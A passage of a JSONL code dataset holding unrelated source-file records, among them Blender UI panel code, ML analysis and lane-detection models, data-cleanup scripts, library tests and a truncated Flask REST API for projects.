ico[\"sampling_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_influence\", text=\"\",\n\t\t\t\t icon_value=(ico[\"influences_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_influence\n\t\t\t\t\t\t\t\telse ico[\"influences_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_ramp\", text=\"\",\n\t\t\t\t icon_value=(ico[\"ramp_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_ramp\n\t\t\t\t\t\t\t\telse ico[\"ramp_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n# def bl_shading_panel(layout):\n# \tcontext = bpy.context\n# \tview = context.space_data\n# \tscene = context.scene\n# \tgs = scene.game_settings\n# \tobj = context.object\n\n# \tcol = layout.column()\n\n# \tif not scene.render.use_shading_nodes:\n# \t\tcol.prop(gs, \"material_mode\", text=\"\")\n\n# \tif view.viewport_shade == 'SOLID':\n# \t\tcol.prop(view, \"show_textured_solid\")\n# \t\tcol.prop(view, \"use_matcap\")\n# \t\tif view.use_matcap:\n# \t\t\tcol.template_icon_view(view, \"matcap_icon\")\n# \telif view.viewport_shade == 'TEXTURED':\n# \t\tif scene.render.use_shading_nodes or gs.material_mode != 'GLSL':\n# \t\t\tcol.prop(view, \"show_textured_shadeless\")\n\n# \tcol.prop(view, \"show_backface_culling\")\n\n# \tif view.viewport_shade not in {'BOUNDBOX', 'WIREFRAME'}:\n# \t\tif obj and obj.mode == 
'EDIT':\n# \t\t\tcol.prop(view, \"show_occlude_wire\")\n\n# \tfx_settings = view.fx_settings\n\n# \tif view.viewport_shade not in {'BOUNDBOX', 'WIREFRAME'}:\n# \t\tsub = col.column()\n# \t\tsub.active = view.region_3d.view_perspective == 'CAMERA'\n# \t\tsub.prop(fx_settings, \"use_dof\")\n# \t\tcol.prop(fx_settings, \"use_ssao\", text=\"Ambient Occlusion\")\n# \t\tif fx_settings.use_ssao:\n# \t\t\tssao_settings = fx_settings.ssao\n# \t\t\tsubcol = col.column(align=True)\n# \t\t\tsubcol.prop(ssao_settings, \"factor\")\n# \t\t\tsubcol.prop(ssao_settings, \"distance_max\")\n# \t\t\tsubcol.prop(ssao_settings, \"attenuation\")\n# \t\t\tsubcol.prop(ssao_settings, \"samples\")\n# \t\t\tsubcol.prop(ssao_settings, \"color\")\n\n","sub_path":"tools/anki_scene_exporter/ui/panel_layouts.py","file_name":"panel_layouts.py","file_ext":"py","file_size_in_byte":50210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"577500077","text":"# Copyright 2019 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"Module holding the class of main interface of running analysis\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nimport argparse\nimport logging\nimport time\n\nfrom ml_eda.analysis import qualitative_analysis\nfrom ml_eda.analysis import quantitative_analysis\nfrom ml_eda.analysis import descriptive_analysis\nfrom ml_eda.metadata import metadata_loader\nfrom ml_eda.metadata import run_metadata_pb2\nfrom ml_eda.preprocessing import preprocessor_factory\nfrom ml_eda.orchestration.analysis_tracker import AnalysisTracker\nfrom ml_eda.reporting import report_generator\n\n\nclass Run:\n \"\"\"Class of main interface for running analysis\"\"\"\n _run_metadata = run_metadata_pb2.AnalysisRun()\n\n def __init__(self, config_params: argparse.ArgumentParser):\n # Parameter from CLI\n self._config_params = config_params\n self._run_metadata.timestamp_sec = time.time()\n\n # Load data definition\n self._metadata_def = metadata_loader.load_metadata_def(\n self._config_params)\n self._run_metadata.datasource.CopyFrom(self._metadata_def.datasource)\n self.tracker = AnalysisTracker(self._metadata_def)\n\n self.report_path = self._config_params.report_path\n self.figure_path = os.path.join(os.path.dirname(self.report_path),\n 'figure')\n if not os.path.exists(self.figure_path):\n os.makedirs(self.figure_path)\n\n logging.info(self._metadata_def.datasource)\n\n def _run_descriptive(self):\n \"\"\"Run descriptive analysis for both numerical and\n categorical attributes.\"\"\"\n analyzer = descriptive_analysis.DescriptiveAnalysis(\n self._metadata_def,\n preprocessor_factory.PreprocessorFactory.new_preprocessor(\n self._config_params))\n\n analyses = list()\n\n analyses.extend(analyzer.run_numerical_descriptive())\n analyses.extend(\n analyzer.run_numerical_histograms(self._metadata_def.histogram_bin))\n\n 
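# categorical attributes next: descriptive stats plus value counts, capped by the configured value_counts_limit\n    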
analyses.extend(analyzer.run_categorical_descriptive())\n vc_limit = self._metadata_def.value_counts_limit\n analyses.extend(analyzer.run_value_counts(vc_limit))\n\n for item in analyses:\n self.tracker.add_analysis(item)\n\n return analyses\n\n def _categorical_cardinality_check(self):\n \"\"\"Check whether the cardinality of the categorical columns are within\n the specified threshold.\"\"\"\n\n def _get_cardinality(attribute):\n descrip_analysis = self.tracker.get_attribute_analysis(\n attribute_name=attribute.name,\n analysis_name=run_metadata_pb2.Analysis.Name.Name(\n run_metadata_pb2.Analysis.DESCRIPTIVE)\n )\n for metric in descrip_analysis[0].smetrics:\n if metric.name == run_metadata_pb2.ScalarMetric.CARDINALITY:\n return metric.value\n return None\n\n valid_list = []\n\n for att in self._metadata_def.categorical_attributes:\n cardinality = _get_cardinality(att)\n if cardinality <= self._metadata_def.general_cardinality_limit:\n valid_list.append(att)\n\n self._metadata_def.update_low_card_categorical(valid_list)\n\n def _run_qualitative(self):\n \"\"\"Run correlation qualitative analysis for combinations of numerical\n and categorical attributes\"\"\"\n analyzer = qualitative_analysis.QualitativeAnalysis(\n self._metadata_def,\n preprocessor_factory.PreprocessorFactory.new_preprocessor(\n self._config_params))\n\n analyses = list()\n if self._metadata_def.contingency_table_run:\n analyses.extend(analyzer.run_contigency_table())\n if self._metadata_def.table_descriptive_run:\n analyses.extend(analyzer.run_categorical_numerical_descriptive())\n\n for item in analyses:\n self.tracker.add_analysis(item)\n\n return analyses\n\n def _run_quantitative(self):\n \"\"\"Run correlation quantitative analysis for combinations of numerical\n and categorical attributes\"\"\"\n analyzer = quantitative_analysis.QuantitativeAnalysis(\n self._metadata_def,\n preprocessor_factory.PreprocessorFactory.new_preprocessor(\n self._config_params))\n\n analyses = []\n if self._metadata_def.pearson_corr_run:\n analyses.extend(analyzer.run_pearson_correlation())\n if self._metadata_def.information_gain_run:\n analyses.extend(analyzer.run_information_gain())\n if self._metadata_def.chi_square_run:\n analyses.extend(analyzer.run_chi_square())\n if self._metadata_def.anova_run:\n analyses.extend(analyzer.run_anova())\n\n for item in analyses:\n self.tracker.add_analysis(item)\n\n return analyses\n\n def run_exploratory_data_analysis(self):\n \"\"\"Run the main exploratory data analysis loop.\"\"\"\n\n self._run_metadata.analyses.extend(self._run_descriptive())\n self._categorical_cardinality_check()\n self._run_metadata.analyses.extend(self._run_qualitative())\n self._run_metadata.analyses.extend(self._run_quantitative())\n\n # pylint: disable-msg=logging-format-interpolation\n logging.info(\"Numerical attributes: {}\\nCategorical attributes: {}\".format(\n self.tracker.get_numerical_attributes(),\n self.tracker.get_categorical_attributes()\n ))\n logging.info('All analysis:\\n{}'.format(\n self.tracker.get_all_analysis_unique_names()))\n\n report = report_generator.create_report_md_content(\n analysis_tracker=self.tracker,\n figure_base_path=self.figure_path)\n\n logging.info(report)\n with open(self.report_path, 'w') as wf:\n wf.write(report)\n","sub_path":"tools/ml-auto-eda/ml_eda/orchestration/analysis_run.py","file_name":"analysis_run.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"196097105","text":"# 
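RESA lane detection: backbone -> channel reducer -> RESA spatial conv -> BUSD decoder, plus a lane-existence head.\n# 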
Adapted from ZJULearning/resa\n# Better to use a decoupled implementation,\n# costs more codes, but clear\nimport torch.nn as nn\nfrom ..common_models import RESA, RESAReducer, BUSD, EDLaneExist\nfrom .._utils import IntermediateLayerGetter\nfrom .. import resnet\n\n\nclass RESANet(nn.Module):\n def __init__(self, num_classes, backbone_name, flattened_size, channel_reduce, pretrained_backbone=True):\n super(RESANet, self).__init__()\n backbone = resnet.__dict__[backbone_name](\n pretrained=pretrained_backbone,\n replace_stride_with_dilation=[False, True, True])\n return_layers = {'layer4': 'out'}\n self.backbone = IntermediateLayerGetter(backbone, return_layers=return_layers)\n in_channels = 2048 if backbone_name == 'resnet50' or backbone_name == 'resnet101' else 512\n self.channel_reducer = RESAReducer(in_channels=in_channels, reduce=channel_reduce)\n self.spatial_conv = RESA()\n self.decoder = BUSD(num_classes=num_classes)\n self.lane_classifier = EDLaneExist(num_output=num_classes - 1, flattened_size=flattened_size)\n\n def forward(self, x):\n x = self.backbone(x)['out']\n x = self.channel_reducer(x)\n x = self.spatial_conv(x)\n\n res = {'out': self.decoder(x),\n 'lane': self.lane_classifier(x)}\n\n return res\n","sub_path":"torchvision_models/lane_detection/resa.py","file_name":"resa.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"329693333","text":"from src.processing import Processing\nimport pandas as pd\n\n\n# inherits from process\nclass KMerScatterPlotData(Processing):\n\n def __init__(self, data, selected, k, peak, top, feature, cmd, sec_struct_data, no_sec_peak):\n super().__init__(data, selected, k, peak, top, feature, cmd, sec_struct_data, no_sec_peak)\n\n # processes data to display k-mer according their frequency later\n def processData(self):\n top_kmer = self.getTopKmer()\n data = self.getDF() # get top k-mer\n threshold = 0.01\n\n file_name1 = data.columns.tolist()[0] # get column names\n file_name2 = data.columns.tolist()[1]\n\n x_axis = data[file_name1].tolist()\n y_axis = data[file_name2].tolist()\n label = data.index.tolist()\n\n result_df = pd.DataFrame(x_axis, index=label, columns=[file_name1])\n result_df[file_name2] = y_axis\n\n k = self.getSettings().getK()\n\n top_kmer_dict = dict.fromkeys(top_kmer.index.tolist(), True) # set highlight-entries on true for max-k-mere\n all_kmer_dict = dict.fromkeys(result_df.index.tolist(), False)\n all_kmer_dict.update(top_kmer_dict)\n\n result_df['highlight'] = [\"TOP {}-mer\".format(k) if all_kmer_dict[kmer] else \"{}-mer\".format(k) for\n kmer in result_df.index.tolist()] # save highlight-values for legend\n\n max_score = result_df[file_name1].max() * result_df[file_name2].max() # is used in next line\n\n # calculates scores for point size in diagram\n result_df = pd.eval(\"size_score = (result_df[file_name1] * result_df[file_name2])/max_score\", target=result_df)\n\n # overwrite all point sizes < 0.01 with 0.01\n small_freq = result_df.query(\"size_score < @threshold\").index.tolist()\n result_df.loc[small_freq, [\"size_score\"]] = threshold\n\n size_score = result_df[\"size_score\"].tolist()\n\n return [result_df, label, [file_name1, file_name2], size_score]\n","sub_path":"src/kMerScatterPlotData.py","file_name":"kMerScatterPlotData.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"242439778","text":"import os\n\n# Check to 
make sure all the labels have files\n#f = open(\"deerlabels.txt\", \"r\")\n#for line in f.readlines():\n# fname = line.split()[0].split(\"/\")[2]\n# if not os.path.exists(\"labelled/\" + fname):\n# print(fname)\n\ni = 0\nlab = open(\"templabels.txt\", \"r\")\nl = lab.read()\n#print(l)\n# Check to make sure all the files have labels\nfor f in os.listdir(\"labelled\"):\n af = f + \"\\n\"\n if af not in l:\n os.rename(\"labelled/\" + f, \"otherdeer/\" + f)\n i += 1\nprint(i)\n\n","sub_path":"automl_training/missouri_camtraps/checkfiles.py","file_name":"checkfiles.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"164730198","text":"import re\n\nimport scrapy\n\nfrom scrapy.loader import ItemLoader\nfrom ..items import PrivatItem\nfrom itemloaders.processors import TakeFirst\npattern = r'(\\xa0)?'\n\nclass PrivatSpider(scrapy.Spider):\n\tname = 'privat'\n\tstart_urls = ['https://privatbank.com.cy/en/news/']\n\n\tdef parse(self, response):\n\t\tpost_links = response.xpath('//h2/a/@href').getall()\n\t\tyield from response.follow_all(post_links, self.parse_post)\n\n\t\tnext_page = response.xpath('//a[@title=\"Next →\"]/@href').get()\n\t\tif next_page:\n\t\t\tyield response.follow(next_page, self.parse)\n\n\n\tdef parse_post(self, response):\n\n\t\tdate = response.xpath('//span[@class=\"date\"]/text()').get()\n\t\ttitle = response.xpath('//h1/text()').get()\n\t\tcontent = response.xpath('//div[@class=\"static\"]//text()[not (ancestor::h1)]').getall()\n\t\tcontent = [p.strip() for p in content if p.strip()]\n\t\tcontent = re.sub(pattern, \"\",' '.join(content))\n\n\n\t\titem = ItemLoader(item=PrivatItem(), response=response)\n\t\titem.default_output_processor = TakeFirst()\n\n\t\titem.add_value('title', title)\n\t\titem.add_value('link', response.url)\n\t\titem.add_value('content', content)\n\t\titem.add_value('date', date)\n\n\t\tyield item.load_item()\n","sub_path":"privat/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"393942703","text":"import numpy as np\nfrom data_utils import input_from_line,result_to_json\nimport tensorflow as tf\nimport pickle\nfrom tensorflow.contrib.crf import viterbi_decode\ndef decode( logits, lengths, matrix):\n \"\"\"\n :param logits: [batch_size, num_steps, num_tags]float32, logits\n :param lengths: [batch_size]int32, real length of each sequence\n :param matrix: transaction matrix for inference\n :return:\n \"\"\"\n # inference final labels usa viterbi Algorithm\n paths = []\n small = -1000.0\n start = np.asarray([[small]*13 +[0]])\n for score, length in zip(logits, lengths):\n score = score[:length]\n pad = small * np.ones([length, 1])\n logits = np.concatenate([score, pad], axis=1)\n logits = np.concatenate([start, logits], axis=0)\n path, _ = viterbi_decode(logits, matrix)\n\n paths.append(path[1:])\n return paths\n\nwith open('maps.pkl', \"rb\") as f:\n char_to_id, id_to_char, tag_to_id, id_to_tag = pickle.load(f)\nline='我是中国人'\n_,chars,segs,tags=input_from_line(line,char_to_id)\nprint(chars)\nprint(segs)\n\noutput_graph_path='../model/ner_frozen.pb'\n \nwith tf.Graph().as_default():\n output_graph_def = tf.GraphDef()\n with open(output_graph_path, \"rb\") as f:\n output_graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(output_graph_def, name=\"\")\n\n with tf.Session() as sess:\n 
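# resolve the exporter's tensor names inside the frozen graph, then fetch lengths, logits and the CRF transition matrix in a single run\n        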
char_inputs=sess.graph.get_tensor_by_name('ChatInputs:0')\n seg_inputs=sess.graph.get_tensor_by_name('SegInputs:0')\n dropout= sess.graph.get_tensor_by_name('Dropout:0')\n feed_dict={char_inputs:np.asarray(chars),\n seg_inputs:np.asarray(segs),\n dropout:1.0\n }\n trans_node = sess.graph.get_tensor_by_name(\"crf_loss/transitions:0\")\n lengths_node=sess.graph.get_tensor_by_name('lengths:0')\n logits_node=sess.graph.get_tensor_by_name('project/logits_output:0')\n lengths,logits,trans=sess.run([lengths_node,logits_node,trans_node],feed_dict)\n\nbatch_paths =decode(logits, lengths, trans)\nprint(batch_paths[0])\ntags = [id_to_tag[idx] for idx in batch_paths[0]]\nprint(result_to_json(line, tags))\n \n","sub_path":"experiment-backup/cpp/scripts/freeze_graph_test.py","file_name":"freeze_graph_test.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"198607497","text":"from creation import *\nfrom utils import *\nfrom numUtils import *\n# from config import *\nfrom query import *\nfrom optimization import sway\n\nfrom update import *\nfrom cluster import *\nfrom discretization import *\n\n##################\n### test functions\ndef test_the():\n oo(the)\n\ndef test_rand():\n t = []\n u = []\n\n # global Seed\n # Seed = 1\n for i in range(1, 1000):\n t.append(rint(0, 100, 1))\n for i in range(1, 1000):\n u.append(rint(0, 100, 1))\n \n for n, num in enumerate(t):\n # print(num, u[n])\n assert(num == u[n])\n\ndef test_some():\n the['max'] = 32\n num1 = NUM()\n for i in range(1, 10000):\n add(num1, i)\n # oo(has(num1))\n\ndef test_num():\n num1 = NUM()\n num2 = NUM()\n\n for i in range(1, 10000):\n add(num1, rand())\n\n for i in range(1, 10000):\n add(num2, rand()**2)\n\n print(1, rnd(mid(num1)), rnd(div(num1)))\n print(2, rnd(mid(num2)), rnd(div(num2)))\n return 0.5 == rnd(mid(num1)) and mid(num1) > mid(num2)\n\ndef test_sym():\n sym = adds(SYM(), ['a', 'a', 'a', 'a', 'b', 'b', 'c'])\n print(mid(sym), rnd(div(sym)))\n return 1.38==rnd(div(sym))\n\ndef test_csv():\n global n\n n = 0\n def csv_fun(t):\n global n\n n += len(t)\n csv(the[\"file\"], csv_fun)\n\n return n == 8*399\n\ndef test_data():\n data = DATA.read(the['file'])\n col = data['cols']['x'][0]\n print(col['lo'], col['hi'], mid(col), div(col))\n oo(stats(data))\n\ndef test_clone():\n data1 = DATA.read(the['file'])\n data2 = DATA.clone(data1, data1['rows'])\n\n oo(stats(data1))\n oo(stats(data2))\n\ndef test_cliffs():\n assert False == cliffsDelta([8,7,6,2,5,8,7,3], [8,7,6,2,5,8,7,3]), \"1\"\n assert True == cliffsDelta([8,7,6,2,5,8,7,3], [9,9,7,8,10,9,6]), \"2\"\n t1 = []\n t2 = []\n for i in range(0, 1000):\n t1.append(rand())\n for i in range(0, 1000):\n t2.append(rand()**0.5)\n \n assert False == cliffsDelta(t1, t1), \"3\" \n assert True == cliffsDelta(t1, t2), \"4\"\n diff = False\n j = 1.0\n while not diff:\n def func(x):\n return x*j\n t3 = list(map(func, t1))\n diff = cliffsDelta(t1, t3)\n print(\">\", rnd(j), diff)\n j = j*1.025\n\ndef test_dist():\n data = DATA.read(the['file'])\n num = NUM()\n for row in data['rows']:\n add(num, dist(data, row, data['rows'][1]))\n oo({'lo': num['lo'], 'hi': num['hi'], 'mid': rnd(mid(num)), 'div': rnd(div(num))})\n\ndef test_half():\n data = DATA.read(the['file'])\n left, right, A, B, c = half(data)\n print(len(left), len(right))\n l = DATA.clone(data, left)\n r = DATA.clone(data, right)\n print('l', o(stats(l)))\n print('r', o(stats(r)))\n \ndef test_tree():\n 
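# build the cluster tree over the csv rows and pretty-print it\n    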
showTree(tree(DATA.read(the['file'])))\n\ndef test_sway():\n    data = DATA.read(the['file'])\n    best, rest = sway(data)\n    print(\"\\nall \", o(stats(data))) \n    print(\"    \",  o(stats(data,div))) \n    print(\"\\nbest\", o(stats(best))) \n    print(\"    \",  o(stats(best,div))) \n    print(\"\\nrest\", o(stats(rest))) \n    print(\"    \",  o(stats(rest,div))) \n    print(\"\\nall ~= best?\", o(diffs(best['cols']['y'], data['cols']['y'])))\n    print(\"best ~= rest?\", o(diffs(best['cols']['y'], rest['cols']['y'])))\n\ndef test_bins():\n    data = DATA.read(the['file'])\n    best, rest = sway(data)\n    print('all', '', '', '', o({'best': len(best['rows']), 'rest': len(rest['rows'])}))\n    global b4\n    for t in (bins(data['cols']['x'], {'best': best['rows'], 'rest': rest['rows']})):\n        for range in t:\n            if range['txt'] != b4:\n                print('')\n            b4 = range['txt']\n            print(range['txt'], range['lo'], range['hi'], \n                rnd(value(range['y']['has'], len(best['rows']), len(rest['rows']), \"best\")), \n                o(range['y']['has']))","sub_path":"src/hw5/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"622371783","text":"# -*- mode: python -*-\n\nload(\"@fbcode_macros//build_defs:export_files.bzl\", \"export_file\")\nload(\"@fbcode_macros//build_defs:native_rules.bzl\", \"buck_sh_test\")\nload(\n    \"//hphp:DEFS.bzl\",\n    \"is_gcc\",\n    \"is_opt_hhvm_build\",\n)\n\ndef gdb_python_test(src, cmds = None, extra = []):\n    sanitized_name = src.replace(\"/\", \"_\").replace(\":\", \"\")\n    test_name = \"gdb_python_test_\" + sanitized_name\n    expect_name = sanitized_name + \".expect\"\n    if src[0] == \":\":\n        srcs = (src, \"\")\n        export_file(name = src[1:])\n    else:\n        srcs = src.split(\"/\", 2)\n        srcs[0] = \"//hphp/test:\" + srcs[0]\n        srcs[1] = \"/\" + srcs[1]\n\n    if cmds == None:\n        cmds = sanitized_name + \".cmds\"\n        export_file(name = cmds)\n\n    export_file(name = expect_name)\n    buck_sh_test(\n        name = test_name,\n        args = [\n            \"$(location //hphp/hhvm:hhvm)\",\n            \"$(location :\" + cmds + \")\",\n            \"$(location //hphp/tools/gdb:pyfiles)/hhvm.py\",\n            \"$(location \" + srcs[0] + \")\" + srcs[1],\n            \"$(location :\" + expect_name + \")\",\n            \"0\" if is_gcc() else \"1\",\n            \"1\" if is_opt_hhvm_build() else \"0\",\n            \"\" if src[0] == \":\" else \"1\",\n        ] + extra,\n        test = \"gdb_python_test.sh\",\n    )\n","sub_path":"hphp/tools/gdb/gdb-test/defs.bzl","file_name":"defs.bzl","file_ext":"bzl","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"273447004","text":"\"\"\"\nUsing regular expressions, replace every number in the\ntext below with its hexadecimal representation.\nPrint the result.\n\"\"\"\nimport re\n\ndef read(q):\n    x=input(q)\n    while not re.match(r'(?:[0]\\.\\d+)|(?:[1-9]\\d*(?:\\.\\d+)?)', x):\n        x= input(q)\n    return float(x)\n\ndef convert_base(num, to_base=10, from_base=10):\n    if isinstance(num, str):\n        n = int(num, from_base)\n    else:\n        n=int(num)\n    alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n    if n < to_base:\n        return alphabet[n]\n    else:\n        return convert_base(n // to_base, to_base) + alphabet[n % to_base]\n\nnumber = read('Enter a number: ')\nprint(convert_base(number, to_base=16, from_base=10))","sub_path":"lashtabegav/second/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"570955984","text":"\nimport numpy as np\nimport 
cv2\nimport os\nimport math\noriginal_dir=\"D:/dataset/comma_c12_uisee_100_102_104_105_115_118_m/img/\"\n\nlabel_dir = \"comma_label_ds.txt\"\n\n\npredict_dir1 = \"prediction_comma_nvNet_5_19.log\"\npredict_dir5 = \"prediction_comma_vgg_fla_pw_3channel_kivinet_5_19.log\"\npredict_dir4 = \"prediction_comma_seg_fla_pw_3channel_kivinet_5_19.log\"\npredict_dir3 = \"prediction_comma_inception5_19.log\"\npredict_dir2 = \"prediction_comma_vgg_transfer_5_19.log\"\ndef angle_filter(angle,filter_size = 11):\n filter = np.ones((1,filter_size),dtype=np.float)/filter_size\n for i in range(filter_size//2,angle.shape[0]-filter_size//2):\n mul = np.matmul(filter,angle[i-filter_size//2:i+filter_size//2+1,:])\n angle[i,:] = mul\n return np.squeeze(angle,axis=1)\nf_label = open(label_dir,'r')\nf_label_lines = f_label.readlines()\nlabel = np.zeros((len(f_label_lines),2))\nfor i,j in enumerate(f_label_lines):\n label[i][0] = float(j.split(\",\")[-2])\n label[i][1] = float(j.split(\",\")[-1])\nf_label.close()\nif False:\n label[:,0] = angle_filter(np.reshape(label[:,0],[-1,1]))\n\nbase = 7680\nindex = 900 #900 230 1375 1800\nk=20\nf_all = []\nf_l = open(label_dir,\"r\").readlines()[index]\nf_p1 = open(predict_dir1,\"r\").readlines()[base+index]\nf_p2 = open(predict_dir2,\"r\").readlines()[base+index]\nf_p3 = open(predict_dir3,\"r\").readlines()[base+index]\nf_p4 = open(predict_dir4,\"r\").readlines()[base+index]\nf_p5 = open(predict_dir5,\"r\").readlines()[base+index]\nf_all.append(f_l)\nf_all.append(f_p1)\nf_all.append(f_p2)\nf_all.append(f_p3)\nf_all.append(f_p4)\nf_all.append(f_p5)\nimg = cv2.imread(original_dir+str(index)+\".jpg\")\nimg = cv2.resize(img,(320,160))\ncolor = [(0,0,255),(0,255,0),(255,0,0),(238, 203, 173),(139, 117, 0),( 0, 165,255)]\nfor id,f in enumerate(f_all):\n if id==0:\n steer = -label[index][0]+0.3\n speed= -label[index][1]\n else:\n steer,speed = f.split(\",\")[-2:]\n steer = -float(steer)+0.3\n speed = -float(speed)\n print(steer)\n if steer>0:\n steer_sqrt = math.sqrt(abs(steer))\n else:\n steer_sqrt = -math.sqrt(abs(steer))\n x = np.array([160,160+0.3*steer_sqrt*k,160+steer_sqrt*k])\n y = np.array([150,100,50])\n poly = np.poly1d(np.polyfit(x, y, 2))\n font = cv2.FONT_HERSHEY_SIMPLEX\n # cv2.putText(img, \"Steer:%.3f\"%steer, (50, 250), font, 0.5, (255, 255, 255), 1)\n # cv2.putText(img, \"Speed:15\", (50, 270), font, 0.5, (255, 255, 255), 1)\n # cv2.line(img,(320+int(steer_sqrt*k),100),(320+int(steer_sqrt*k),120),(0,255,0),5)\n # cv2.line(img,(320+int(steer_sqrt*k),100),(300+int(steer_sqrt*k),100),(0,255,0),5)\n if int(160+steer_sqrt*k)>160:\n mi = int(160+steer_sqrt*k)\n ma = 160\n else:\n ma = int(160+steer_sqrt*k)\n mi = 160\n for i in range(ma,mi,1):\n y_i = int(poly(i) )\n cv2.circle(img, (i, y_i), 2, color[id], 2, 8, 0)\n cv2.imshow(\"img\",img)\n cv2.waitKey()\ncv2.imwrite(\"co_poly/\"+str(index)+\".jpg\",img)\n# cv2.destroyAllWindows()\n\n# alphaReserve = 0.8\n# BChannel = 255\n# GChannel = 0\n# RChannel = 0\n# yMin = 237\n# yMax = 277\n# xMin = 45\n# xMax = 170\n\n# img[yMin:yMax, xMin:xMax, 0] = img[yMin:yMax, xMin:xMax, 0] * alphaReserve + BChannel * (1 - alphaReserve)\n# img[yMin:yMax, xMin:xMax, 1] = img[yMin:yMax, xMin:xMax, 1] * alphaReserve + GChannel * (1 - alphaReserve)\n# img[yMin:yMax, xMin:xMax, 2] = img[yMin:yMax, xMin:xMax, 2] * alphaReserve + RChannel * (1 - alphaReserve)\n\n\n# steer = pred[0][0]\n# k = 100\n# if steer>0:\n# steer_sqrt = math.sqrt(abs(steer))\n# else:\n# steer_sqrt = -math.sqrt(abs(steer))\n# x = 
np.array([320,320+0.3*steer_sqrt*k,320+steer_sqrt*k])\n# y = np.array([200,150,100])\n# poly = np.poly1d(np.polyfit(x, y, 2))\n# font = cv2.FONT_HERSHEY_SIMPLEX\n# cv2.putText(img, \"Steer:%.3f\"%steer, (50, 250), font, 0.5, (255, 255, 255), 1)\n# cv2.putText(img, \"Speed:15\", (50, 270), font, 0.5, (255, 255, 255), 1)\n# # cv2.line(img,(320+int(steer_sqrt*k),100),(320+int(steer_sqrt*k),120),(0,255,0),5)\n# # cv2.line(img,(320+int(steer_sqrt*k),100),(300+int(steer_sqrt*k),100),(0,255,0),5)\n# if int(320+steer_sqrt*k)<320:\n# mi = int(320+steer_sqrt*k)\n# ma = 320\n# else:\n# ma = int(320+steer_sqrt*k)\n# mi = 320\n# for i in range(mi,ma,1):\n# y_i = int(poly(i) )\n# cv2.circle(img, (i, y_i), 3, ( 197, 205,122), 3, 8, 0)\n# cv2.imshow(\"img\",img)\n# cv2.waitKey()\n# cv2.destroyAllWindows()\n ","sub_path":"comma_offline.py","file_name":"comma_offline.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117931884","text":"import json\r\nimport os\r\n\r\nnameStr = []\r\n\r\nwith open(\"G:\\人_机动车_非机动车\\coco2voc\\COCO_train.json\", \"r+\") as f:\r\n data = json.load(f)\r\n print(\"read ready\")\r\n\r\nfor i in data:\r\n imgName = str(i[\"filename\"]).zfill(12) + \".jpg\"\r\n nameStr.append(imgName)\r\n\r\nnameStr = set(nameStr)\r\nprint(nameStr)\r\nprint(len(nameStr))\r\n\r\npath = \"G:/人_机动车_非机动车/train2017/\"\r\n\r\nfor file in os.listdir(path):\r\n if (file not in nameStr):\r\n os.remove(path + file)","sub_path":"data_tools/coco转voc/删除不需要的图片.py","file_name":"删除不需要的图片.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"630356682","text":"import csv\nimport io\nfrom collections import OrderedDict\nfrom flask import Blueprint, render_template, request, make_response, current_app\nfrom flask_restful import Resource, Api\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\n\nblueprint = Blueprint('red', __name__)\n\nmongo = PyMongo()\n\n\n@blueprint.route('/')\ndef index():\n return render_template('index.html', googlemaps_key=current_app.config['GOOGLEMAPS_KEY'])\n\n\napi = Api()\n\n\ndef jsonify_doc(doc):\n return {\n k: str(v) if isinstance(v, ObjectId) else v\n for k, v in doc.items()\n }\n\n\nclass Project(Resource):\n def get(self, projid):\n return jsonify_doc(\n mongo.db.projects.find_one_or_404(\n {'_id': ObjectId(projid)}\n )\n )\n\n def put(self, projid):\n mongo.db.projects.replace_one(\n {'_id': ObjectId(projid)},\n request.form.to_dict()\n )\n return '', 204\n\n def delete(self, projid):\n mongo.db.projects.delete_one({'_id': ObjectId(projid)})\n return '', 204\n\napi.add_resource(Project, '/projects/<projid>')\n\n\nclass ProjectList(Resource):\n def get(self):\n return [\n jsonify_doc(doc)\n for doc in mongo.db.projects.find()\n ]\n\n def post(self):\n res = 